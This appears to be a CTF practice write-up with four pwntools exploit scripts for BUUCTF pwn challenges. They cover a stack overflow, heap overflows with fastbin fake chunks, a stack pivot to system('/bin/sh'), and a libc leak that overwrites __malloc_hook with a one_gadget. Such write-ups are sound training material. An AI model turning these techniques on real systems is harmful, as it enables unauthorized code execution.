PWN-PRACTICE-BUUCTF-16
PWN-PRACTICE-BUUCTF-16
- mrctf2020_easyoverflow
- hitcontraining_magicheap
- ciscn_2019_s_4
- 0ctf_2017_babyheap
mrctf2020_easyoverflow
覆蓋main函數中的v5,使之為"n0t_r3@11y_f1@g"
# mrctf2020_easyoverflow -- as the line above states, the goal is to overwrite
# v5 in main() with the string "n0t_r3@11y_f1@g". The script sends one line:
# 0x30 filler bytes followed by that exact string.
from pwn import *
r=remote("node4.buuoj.cn",29521)  # practice-platform instance; host/port are page-specific
# 0x30 bytes of padding sit before the target string -- presumably the distance
# from the input buffer to v5 on the stack; TODO confirm against the binary.
payload='a'*0x30+"n0t_r3@11y_f1@g"
r.sendline(payload)
r.interactive()
# (page section heading that followed this script: hitcontraining_magicheap)
參考:picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
# hitcontraining_magicheap -- drives the binary's text menu over the network.
# NOTE(review): str literals are concatenated with p64() output below, so this
# is written for Python 2 pwntools; under Python 3 those lines raise TypeError.
from pwn import *
io=remote("node4.buuoj.cn",27011)  # practice-platform instance; page-specific
#io=process("./magicheap")
elf=ELF("./magicheap")

def create(size,content):
    # Menu option 1: allocate a chunk of `size` bytes and write `content` into it.
    io.sendlineafter("choice :","1")
    io.sendlineafter("Size of Heap : ",str(size))
    io.sendlineafter("Content of heap:",content)

def edit(index,size,content):
    # Menu option 2: rewrite chunk `index` with `size` bytes of `content`.
    # The binary takes the size from the caller, so nothing here bounds it
    # to the chunk's original allocation.
    io.sendlineafter("choice :","2")
    io.sendlineafter("Index :",str(index))
    io.sendlineafter("Size of Heap : ",str(size))
    io.sendlineafter("Content of heap : ",content)

def delete(index):
    # Menu option 3: free chunk `index`.
    io.sendlineafter("choice :","3")
    io.sendlineafter("Index :",str(index))

def getshell():
    # Hidden menu option 4869 (the number is taken as-is from the challenge).
    io.sendlineafter("choice :","4869")

# Fixed address from the binary -- presumably the global array of heap
# pointers, going by the name; verify in the binary. Any rebuild or PIE-enabled
# build of the target would invalidate it.
heaparray=0x00000000006020C0
# Derived from heaparray; the -0x38 and +5 adjustments are challenge-specific.
fake_chunk_prev_size=heaparray-0x38+5
#gdb.attach(io)
#pause()
create(0x10,"a"*8)#chunk0
create(0x10,"b"*8)#chunk1
create(0x60,"c"*8)#chunk2
#pause()
delete(2)
#pause()
# len(payload) is 0x28 but chunk1 was created with size 0x10: this edit
# deliberately writes past chunk1 into the header area of the freed chunk2
# (the values 0, 0x71 and fake_chunk_prev_size land there).
payload="b"*0x10+p64(0)+p64(0x71)+p64(fake_chunk_prev_size)
edit(1,len(payload),payload)
#pause()
create(0x60,"c"*8)#chunk2
create(0x60,"d"*8)#fake_chunk
#pause()
# Writes 0x1306 (0x1305+1) at offset 3 of index 2; the 3-byte lead-in matches
# the +5 adjustment used in fake_chunk_prev_size above.
payload="d"*3+p64(0x1305+1)
edit(2,len(payload),payload)
getshell()
io.interactive()
# (page section heading that followed this script: ciscn_2019_s_4)
泄露棧地址,然后棧遷移
# ciscn_2019_s_4 -- as the line above says: leak a stack address, then pivot
# the stack. Two sends: the first leaks a pointer, the second delivers the
# frame that the leaked address makes computable.
# NOTE(review): str literals are concatenated with p32() output below, so this
# is written for Python 2 pwntools; under Python 3 those lines raise TypeError.
from pwn import *
context.log_level="debug"  # pwntools prints every send/recv in hex
#io=process('./ciscn_s_4')
io=remote('node4.buuoj.cn',28112)  # practice-platform instance; page-specific
elf=ELF('./ciscn_s_4')
# Distance from the leaked stack value to the start of our input buffer
# (challenge-specific; determined with the commented gdb breakpoint below).
input_stk_offset=0x50
# Fixed 32-bit addresses taken from the binary -- presumably a non-PIE build
# given the 0x0804xxxx range; verify if the target is rebuilt.
leave_ret=0x080484b8
system=0x08048559
#gdb.attach(io,"break * 0x080485CD")
io.recvuntil('your name?\n')
# 36 'a' + 4 'b': the 'bbbb' marker lets recvuntil() find the end of the
# echoed name so the bytes after it can be parsed.
payload='a'*(40-4)+'b'*4
io.send(payload)
io.recvuntil('bbbb')
io.recv(12)  # skip 12 bytes; the 4 bytes after them are the stack leak
stk=u32(io.recv(4))
input_stk=stk-input_stk_offset
io.recvuntil('\n')
# Second frame: 4 bytes, system's address, a pointer to the '/bin/sh' string
# that sits 12 bytes into this buffer, padded to 0x28, then the saved-ebp
# value (input_stk) and the leave;ret gadget.
payload='a'*4+p32(system)+p32(input_stk+12)+'/bin/sh\x00'
payload=payload.ljust(0x28,'\x00')
payload+=p32(input_stk)
payload+=p32(leave_ret)
io.send(payload)
io.interactive()
# (page section heading that followed this script: 0ctf_2017_babyheap)
參考:0ctf_2017_babyheap
# 0ctf_2017_babyheap -- drives the binary's four-command menu over the network.
# NOTE(review): str literals are concatenated with p64() output and
# bytes.ljust() is given a str fill below, so this is written for Python 2
# pwntools; under Python 3 those lines raise TypeError.
from pwn import *
context.log_level="debug"  # pwntools prints every send/recv in hex
io=remote("node4.buuoj.cn",28235)  # practice-platform instance; page-specific
#io=process("./0ctf_2017_babyheap")
elf=ELF("./0ctf_2017_babyheap")
# Every libc offset below is tied to this exact file; a different libc build
# invalidates them.
libc=ELF("./libc-2.23-16-x64.so")

def alloc(size):
    # Command 1: allocate `size` bytes (the page's own comment notes calloc).
    io.sendlineafter("Command: ","1")
    io.sendlineafter("Size: ",str(size))

def fill(index,size,content):
    # Command 2: write `size` bytes of `content` into slot `index`.
    # The size is supplied by the caller, not bounded by the slot's allocation.
    io.sendlineafter("Command: ","2")
    io.sendlineafter("Index: ",str(index))
    io.sendlineafter("Size: ",str(size))
    io.sendlineafter("Content: ",content)

def free(index):
    # Command 3: free slot `index`.
    io.sendlineafter("Command: ","3")
    io.sendlineafter("Index: ",str(index))

def dump(index):
    # Command 4: print the contents of slot `index`.
    io.sendlineafter("Command: ","4")
    io.sendlineafter("Index: ",str(index))

#gdb.attach(io)
#pause()
alloc(0x10)#0
alloc(0x10)#1
alloc(0x80)#2
alloc(0x20)#3
alloc(0x60)#4
alloc(0x10)#5
#pause()
# len(payload) is 0x20 but slot 0 holds 0x10 bytes: the write runs past slot 0
# and places 0xb1 where the next chunk's size field sits.
payload="a"*0x18+p64(0xb1)
fill(0,len(payload),payload)
free(1)
alloc(0xa0)#1 calloc
payload="b"*0x10+p64(0)+p64(0x91)
fill(1,len(payload),payload)
free(2)
dump(1)
# Take the last pointer in the dump that ends in 0x7f (6 significant bytes),
# widen it to 8 bytes and subtract the fixed offset 0x3c4b78 to get libc's base.
libc_base = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00')) -0x3c4b78
print(hex(libc_base))
malloc_hook=libc_base+libc.sym["__malloc_hook"]  # symbol looked up in the named libc
print(hex(malloc_hook))
#pause()
free(4)
# Again longer than slot 3's 0x20 bytes: writes 0, 0x71 and an address 0x23
# below __malloc_hook past the end of slot 3.
payload="c"*0x20+p64(0)+p64(0x71)+p64(malloc_hook-0x23)
fill(3,len(payload),payload)
alloc(0x60)#2
alloc(0x60)#4 fake chunk
# one_gadget offset hard-coded for the libc file named above; TODO re-derive
# if that file changes.
one_gadget=libc_base+0x4526a
# 0x13 leading zero bytes then the address, written through slot 4.
payload="\x00"*0x13+p64(one_gadget)
fill(4,len(payload),payload)
#pause()
alloc(1)  # one more allocation after the hook write; then hand over the session
io.interactive()
# (page section heading that followed this script: 總結)